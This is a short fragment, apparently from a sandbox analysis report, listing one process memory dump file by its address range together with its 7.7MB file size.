                          • memory/4788-1242-0x0000000074C30000-0x00000000753E0000-memory.dmp

                            Filesize

                            7.7MB